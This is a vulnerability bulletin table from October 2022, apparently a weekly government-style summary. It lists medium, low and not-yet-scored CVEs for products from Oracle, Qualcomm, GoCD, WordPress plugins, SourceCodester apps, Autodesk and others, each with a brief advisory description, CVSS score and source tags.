oracle — peoplesoft_enterprise	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.58, 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).	2022-10-18	5.3	CVE-2022-21602 MISC
oracle — peoplesoft_enterprise_peopletools	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Security). Supported versions that are affected are 8.58, 8.59 and 8.60. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where PeopleSoft Enterprise PeopleTools executes to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).	2022-10-18	5.5	CVE-2022-39407 MISC
oracle — solaris	Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	5.5	CVE-2022-39401 MISC
oracle — solaris	Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	5.5	CVE-2022-39417 MISC
oracle — transportation_management	Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Transportation Management. CVSS 3.1 Base Score 5.4 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L).	2022-10-18	5.4	CVE-2022-21591 MISC
oracle — transportation_management	Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Data, Functional Security). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).	2022-10-18	5.4	CVE-2022-39420 MISC
oracle — transportation_management	Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Business Process Automation). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Transportation Management accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).	2022-10-18	4.9	CVE-2022-39411 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 6.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H).	2022-10-18	6	CVE-2022-21621 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.38. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).	2022-10-18	6	CVE-2022-39423 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.4	CVE-2022-21627 MISC
oracle — weblogic_server	Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle WebLogic Server executes to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 5.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H).	2022-10-18	5.2	CVE-2022-21616 MISC
oroinc — orocommerce	OroCommerce is an open-source Business to Business Commerce application. Versions between 4.1.0 and 4.1.17 inclusive, 4.2.0 and 4.2.11 inclusive, and between 5.0.0 and 5.0.3 inclusive, are vulnerable to Cross-site Scripting in the UPS Surcharge field of the Shipping rule edit page. The attacker needs permission to create or edit a shipping rule. This issue has been patched in version 5.0.6. There are no known workarounds.	2022-10-18	5.4	CVE-2022-31037 CONFIRM
otrs — otrs	An external attacker is able to send a specially crafted email (with many recipients) and trigger a potential DoS of the system	2022-10-17	6.5	CVE-2022-39052 CONFIRM
passster_project — passster	The Passster WordPress plugin before 3.5.5.5.2 stores the password inside a cookie named “passster” using base64 encoding method which is easy to decode. This puts the password at risk in case the cookies get leaked.	2022-10-17	5.9	CVE-2022-3206 MISC
pivotal — reactor_netty	Reactor Netty HTTP Server, in versions 1.0.11 – 1.0.23, may log request headers in some cases of invalid HTTP requests. The logged headers may reveal valid access tokens to those with access to server logs. This may affect only invalid HTTP requests where logging at WARN level is enabled.	2022-10-19	4.3	CVE-2022-31684 MISC
qemu — qemu	An integer underflow issue was found in the QEMU VNC server while processing ClientCutText messages in the extended format. A malicious client could use this flaw to make QEMU unresponsive by sending a specially crafted payload message, resulting in a denial of service.	2022-10-17	6.5	CVE-2022-3165 MISC
qualcomm — apq8009_firmware	Information disclosure due to exposure of information while GPU reads the data in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables	2022-10-19	5.5	CVE-2022-25664 CONFIRM
qualcomm — apq8096au_firmware	Memory corruption due to use after free in service while trying to access maps by different threads in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking	2022-10-19	6.7	CVE-2022-25666 CONFIRM
qualcomm — aqt1000_firmware	Possible buffer overflow due to lack of buffer length check during management frame Rx handling lead to denial of service in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity	2022-10-19	5.5	CVE-2022-25663 CONFIRM
qualcomm — aqt1000_firmware	Denial of service in BOOT when partition size for a particular partition is requested due to integer overflow when blocks are calculated in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables	2022-10-19	4.6	CVE-2022-22078 CONFIRM
redhat — enterprise_linux	A flaw was found In 389-ds-base. When the Content Synchronization plugin is enabled, an authenticated user can reach a NULL pointer dereference using a specially crafted query. This flaw allows an authenticated attacker to cause a denial of service. This CVE is assigned against an incomplete fix of CVE-2021-3514.	2022-10-14	6.5	CVE-2022-2850 MISC MISC
redhat — openshift	In Red Hat Openshift 1, weak default permissions are applied to the /etc/openshift/server_priv.pem file on the broker server, which could allow users with local access to the broker to read this file.	2022-10-19	5.5	CVE-2013-4281 MISC MISC
redhat — virtualization	A flaw was found in ovirt-engine, which leads to the logging of plaintext passwords in the log file when using otapi-style. This flaw allows an attacker with sufficient privileges to read the log file, leading to confidentiality loss.	2022-10-19	6.5	CVE-2022-2805 MISC MISC
ree6 — ree6	Ree6 is a moderation bot. This vulnerability would allow other server owners to create configurations such as “Better-Audit-Logging” which contain a channel from another server as a target. This would mean you could send log messages to another Guild channel and bypass raid and webhook protections. A specifically crafted log message could allow spamming and mass advertisements. This issue has been patched in version 1.9.9. There are currently no known workarounds.	2022-10-14	5.4	CVE-2022-39302 CONFIRM MISC
related_posts_for_wordpress_project — related_posts_for_wordpress	Cross-site Scripting (XSS) – Stored in GitHub repository barrykooij/related-posts-for-wp prior to 2.1.3.	2022-10-14	5.4	CVE-2022-3506 CONFIRM MISC
relatedcode — messenger	Relatedcode’s Messenger version 7bcd20b allows an authenticated external attacker to access sensitive data of any user of the application. This is possible because the application exposes user data to the public.	2022-10-19	6.5	CVE-2022-41707 MISC MISC
relatedcode — messenger	Relatedcode’s Messenger version 7bcd20b allows an authenticated external attacker to access existing chats in the workspaces of any user of the application. This is possible because the application does not validate permissions correctly.	2022-10-19	4.3	CVE-2022-41708 MISC MISC
rukovoditel — rukovoditel	A stored cross-site scripting (XSS) vulnerability in the Configuration/Holidays module of Rukovoditel v3.2.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter.	2022-10-19	5.4	CVE-2022-43185 MISC
sanitization_management_system_project — sanitization_management_system	A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability.	2022-10-15	6.1	CVE-2022-3518 MISC
sanitization_management_system_project — sanitization_management_system	A vulnerability classified as problematic was found in SourceCodester Sanitization Management System 1.0. Affected by this vulnerability is an unknown functionality of the component Quote Requests Tab. The manipulation of the argument Manage Remarks leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-211015.	2022-10-15	6.1	CVE-2022-3519 MISC
sanitization_management_system_project — sanitization_management_system	A vulnerability was found in SourceCodester Sanitization Management System. It has been classified as problematic. Affected is an unknown function of the file /php-sms/admin/. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210840.	2022-10-14	5.4	CVE-2022-3505 N/A N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system	A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component My Account. The manipulation of the argument First Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211201 was assigned to this vulnerability.	2022-10-18	5.4	CVE-2022-3587 N/A N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system	A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /csms/admin/?page=user/list of the component Create User Handler. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-211046 is the identifier assigned to this vulnerability.	2022-10-17	4.8	CVE-2022-3546 N/A N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system	A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /csms/admin/?page=system_info of the component Setting Handler. The manipulation of the argument System Name/System Short Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-211047.	2022-10-17	4.8	CVE-2022-3547 N/A N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system	A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the component Add New Storage Handler. The manipulation of the argument Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-211048.	2022-10-17	4.8	CVE-2022-3548 N/A N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system	A vulnerability classified as problematic has been found in SourceCodester Simple Cold Storage Management System 1.0. Affected is an unknown function of the file /csms/?page=contact_us of the component Contact Us. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-211194 is the identifier assigned to this vulnerability.	2022-10-18	4.3	CVE-2022-3585 MISC MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system	In Simple Exam Reviewer Management System v1.0 the User List function has improper access control that allows low privileged users to modify user permissions to higher privileges.	2022-10-20	6.5	CVE-2022-42197 MISC MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system	Simple Exam Reviewer Management System v1.0 is vulnerable to Stored Cross Site Scripting (XSS) via the Exam List.	2022-10-20	5.4	CVE-2022-42200 MISC MISC
smackcoders — an_ultimate_wordpress_importer_cum_migration_as_csv_&_xml	The Import all XML, CSV & TXT WordPress plugin before 6.5.8 does not have authorisation in some places, which could allow any authenticated users to access some of the plugin features if they manage to get the related nonce	2022-10-17	4.2	CVE-2022-3244 MISC
solarwinds — orion_platform	Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3 and previous.	2022-10-20	5.4	CVE-2022-36966 CONFIRM CONFIRM
solarwinds — sql_sentry	Sensitive information could be displayed when a detailed technical error message is posted. This information could disclose environmental details.	2022-10-19	5.3	CVE-2022-38107 MISC MISC
sonos — one_firmware	Some versions of Sonos One (1st and 2nd generation) allow partial or full memory access via attacker controlled hardware that can be attached to the Mini-PCI Express slot on the motherboard that hosts the WiFi card on the device.	2022-10-20	6.8	CVE-2020-9285 MISC
sra-admin_project — sra-admin	sra-admin is a background rights management system that separates the front and back end. sra-admin version 1.1.1 has a storage cross-site scripting (XSS) vulnerability. After logging into the sra-admin background, an attacker can upload an html page containing xss attack code in “Personal Center” – “Profile Picture Upload” allowing theft of the user’s personal information. This issue has been patched in 1.1.2. There are no known workarounds.	2022-10-19	5.4	CVE-2022-39301 CONFIRM
tenable — nessus	Insufficiently Protected Credentials: An authenticated user with debug privileges can retrieve stored Nessus policy credentials from the “nessusd” process in cleartext via process dumping. The affected products are all versions of Nessus Essentials and Professional. The vulnerability allows an attacker to access credentials stored in Nessus scanners, potentially compromising its customers’ network of assets.	2022-10-17	6.5	CVE-2022-28291 MISC
themeum — tutor_lms	The Tutor LMS WordPress plugin before 2.0.10 does not escape some course parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-17	4.8	CVE-2022-2563 MISC
thoughtworks — gocd	GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 leak the symmetric key used to encrypt/decrypt any secure variables/secrets in GoCD configuration to authenticated agents. A malicious/compromised agent may then expose that key from memory, and potentially allow an attacker the ability to decrypt secrets intended for other agents/environments if they also are able to obtain access to encrypted configuration values from the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds.	2022-10-14	6.5	CVE-2022-39309 MISC MISC CONFIRM MISC
thoughtworks — gocd	GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 can allow one authenticated agent to impersonate another agent, and thus receive work packages for other agents due to broken access control and incorrect validation of agent tokens within the GoCD server. Since work packages can contain sensitive information such as credentials intended only for a given job running against a specific agent environment, this can cause accidental information disclosure. Exploitation requires knowledge of agent identifiers and ability to authenticate as an existing agent with the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds.	2022-10-14	6.5	CVE-2022-39310 MISC MISC CONFIRM
thoughtworks — gocd	GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions from 19.2.0 to 19.10.0 (inclusive) are subject to a timing attack in validation of access tokens due to use of regular string comparison for validation of the token rather than a constant time algorithm. This could allow a brute force attack on GoCD server API calls to observe timing differences in validations in order to guess an access token generated by a user for API access. This issue is fixed in GoCD version 19.11.0. As a workaround, users can apply rate limiting or insert random delays to API calls made to GoCD Server via a reverse proxy or other fronting web server. Another workaround, users may disallow use of access tokens by users by having an administrator revoke all access tokens through the “Access Token Management” admin function.	2022-10-14	5.9	CVE-2022-39308 MISC MISC MISC CONFIRM
tp-link — ax10_firmware	The web app client of TP-Link AX10v1 V1_211117 uses hard-coded cryptographic keys when communicating with the router. Attackers who are able to intercept the communications between the web client and router through a man-in-the-middle attack can then obtain the sequence key via a brute-force attack, and access sensitive information.	2022-10-18	5.9	CVE-2022-41540 MISC MISC
tp-link — tl-wr841n_firmware	TP-Link TL-WR841N 8.0 4.17.16 Build 120201 Rel.54750n is vulnerable to Cross Site Scripting (XSS).	2022-10-18	6.1	CVE-2022-42202 MISC
wolfssl — wolfssl	An issue was discovered in wolfSSL before 5.5.0. A fault injection attack on RAM via Rowhammer leads to ECDSA key disclosure. Users performing signing operations with private ECC keys, such as in server-side TLS connections, might leak faulty ECC signatures. These signatures can be processed via an advanced technique for ECDSA key recovery. (In 5.5.0 and later, WOLFSSL_CHECK_SIG_FAULTS can be used to address the vulnerability.)	2022-10-15	5.3	CVE-2022-42961 MISC
wp_custom_cursors_project — wp_custom_cursors	The WP Custom Cursors WordPress plugin before 3.0.1 does not have CSRF check in place when creating and editing cursors, which could allow attackers to made a logged in admin perform such actions via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping in some of the cursor options, it could also lead to Stored Cross-Site Scripting	2022-10-17	6.1	CVE-2022-3149 CONFIRM
wp_custom_cursors_project — wp_custom_cursors	The WP Custom Cursors WordPress plugin before 3.0.1 does not have CSRF check in place when deleting cursors, which could allow attackers to made a logged in admin delete arbitrary cursors via a CSRF attack.	2022-10-17	4.3	CVE-2022-3151 CONFIRM
zoom — zoom_on-premise_meeting_connector_mmr	Zoom On-Premise Meeting Connector MMR before version 4.8.20220815.130 contains an improper access control vulnerability. As a result, a malicious actor could obtain the audio and video feed of a meeting they were not authorized to join and cause other meeting disruptions.	2022-10-14	6.5	CVE-2022-28760 MISC
zoom — zoom_on-premise_meeting_connector_mmr	Zoom On-Premise Meeting Connector MMR before version 4.8.20220916.131 contains an improper access control vulnerability. As a result, a malicious actor in a meeting or webinar they are authorized to join could prevent participants from receiving audio and video causing meeting disruptions.	2022-10-14	6.5	CVE-2022-28761 MISC

Low Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
linux — linux_kernel	A vulnerability classified as problematic was found in Linux Kernel. Affected by this vulnerability is the function mvpp2_dbgfs_port_init of the file drivers/net/ethernet/marvell/mvpp2/mvpp2_debugfs.c of the component mvpp2. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier VDB-211033 was assigned to this vulnerability.	2022-10-17	3.5	CVE-2022-3535 N/A N/A
linux — linux_kernel	A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function kcm_tx_work of the file net/kcm/kcmsock.c of the component kcm. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211018 is the identifier assigned to this vulnerability.	2022-10-16	2.5	CVE-2022-3521 MISC MISC
oracle — graalvm	Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).	2022-10-18	3.7	CVE-2022-21619 MISC
oracle — graalvm	Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).	2022-10-18	3.7	CVE-2022-21624 MISC
oracle — graalvm	Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).	2022-10-18	3.7	CVE-2022-39399 MISC
oracle — mysql	Vulnerability in the MySQL Shell product of Oracle MySQL (component: Shell: Core Client). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Shell executes to compromise MySQL Shell. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Shell accessible data as well as unauthorized read access to a subset of MySQL Shell accessible data. CVSS 3.1 Base Score 3.9 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N).	2022-10-18	3.9	CVE-2022-39403 MISC
oracle — solaris	Vulnerability in the Oracle Solaris product of Oracle Systems (component: LDoms). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 3.3 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:L).	2022-10-18	3.3	CVE-2022-21610 MISC
oracle — transportation_management	Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Business Process Automation). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Transportation Management. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).	2022-10-18	2.7	CVE-2022-39409 MISC
redhat — openshift	An input validation vulnerability exists in Openshift Enterprise due to a 1:1 mapping of tenants in Hawkular Metrics and projects/namespaces in OpenShift. If a user creates a project called “MyProject”, and then later deletes it another user can then create a project called “MyProject” and access the metrics stored from the original “MyProject” instance.	2022-10-17	3.5	CVE-2017-7517 MISC MISC
simple_cold_storage_management_system_project — simple_cold_storage_management_system	A vulnerability has been found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument change password leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211189 was assigned to this vulnerability.	2022-10-18	3.5	CVE-2022-3582 MISC MISC

Severity Not Yet Assigned

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
asus — rt-n12e	Asus RT-N12E 2.0.0.39 is affected by an incorrect access control vulnerability. Through system.asp / start_apply.htm, an attacker can change the administrator password without any authentication.	2022-10-19	not yet calculated	CVE-2020-23648 MISC MISC MISC
autodesk — autocad	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	not yet calculated	CVE-2022-41309 MISC
autodesk — autocad	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	not yet calculated	CVE-2022-41310 MISC
autodesk — autocad	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	not yet calculated	CVE-2022-42933 MISC
autodesk — autocad	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	not yet calculated	CVE-2022-42934 MISC
autodesk — autocad	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	not yet calculated	CVE-2022-42935 MISC
autodesk — autocad	A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	not yet calculated	CVE-2022-42943 MISC
autodesk — autocad	A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	not yet calculated	CVE-2022-42944 MISC
automox — automox_agent	The Automox Agent before 40 on Windows incorrectly sets permissions on key files.	2022-10-21	not yet calculated	CVE-2022-36122 MISC MISC
bento4 — bento4	Bento4 1.6.0 has memory leaks via the mp4fragment.	2022-10-19	not yet calculated	CVE-2022-40884 MISC MISC
bento4 — bento4	Bento4 v1.6.0-639 has a memory allocation issue that can cause denial of service.	2022-10-19	not yet calculated	CVE-2022-40885 MISC MISC
dell — isilon_onefs	The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.	2022-10-21	not yet calculated	CVE-2020-5355 CONFIRM
dell — powerscale_onefs	Dell PowerScale OneFS, versions 8.2.2-9.3.0, contain an OS command injection vulnerability. A privileged local malicious user could potentially exploit this vulnerability, leading to a full system compromise. This impacts compliance mode clusters.	2022-10-21	not yet calculated	CVE-2022-34437 CONFIRM
